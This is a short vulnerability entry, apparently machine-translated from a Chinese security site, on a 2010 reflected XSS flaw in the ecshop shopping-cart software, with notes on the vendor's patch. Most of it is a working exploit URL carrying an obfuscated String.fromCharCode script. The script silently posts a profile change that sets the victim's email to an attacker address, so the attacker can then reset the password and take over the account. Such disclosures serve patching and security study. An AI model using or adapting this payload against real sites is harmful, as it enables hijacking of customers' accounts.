ecshop modify any user password vulnerability XSS exploit-vulnerability warning-the black bar safety net

2010-10-04T00:00:00
ID MYHACK58:62201028015
Type myhack58
Reporter 佚名
Modified 2010-10-04T00:00:00

Description

Currently ecshop presence of the reflection typeXSS, you can use, if the secondary development existXSSor other CSRF problem, then use more. Once encountered this problem, slightly affected by its damage)

ByXSSstructure post submission of personal information is modified, the modification is operable mailbox, then password to get back.

Vulnerability to prove:

http://localhost/test/ecshop_gbk272/category.php?id=3&price_min=0&price_max=0&filter_attr=0.0.0.199%2 2%3E%3Cscript%3Eeval%28String. fromCharCode%28120,61,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,40,41,59,120,46,111,112,101,110,40,34,112,111,115,116,34,44,34,104,116,116,112,58,47,47,108,111,99,97,108,104,111,115,116,47,116,101,115,116,47,101,99,115,104,111,112,95,103,98,107,50,55,50,47,117,115,101,114,46,112,104,112,34,41,59,120,46,115,101,116,82,101,113,117,101,115,116,72,101,97,100,101,114,40,34,67,111,110,116,101,110,116,45,84,121,112,101,34,44,34,97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,34,41,59,120,46,115,101,110,100,40,34,97,99,116,61,97,99,116,95,101,100,105,116,95,112,114,111,102,105,108,101,38,101,109,97,105,108,61,120,120,120,64,49,54,51,46,99,111,109,34,41,59%2 9% 2 9%3C/script%3E%3C%2 2

Of course, the order file contains the way to use more concise

The manufacturer published The filter is not strict, is being repaired.

2010-09-03: a patch has been released patch download address: http://bbs.ecshop.com/thread-137475-1-2.html

2010-09-06: for url encoding and decoding, removing the not needed parameters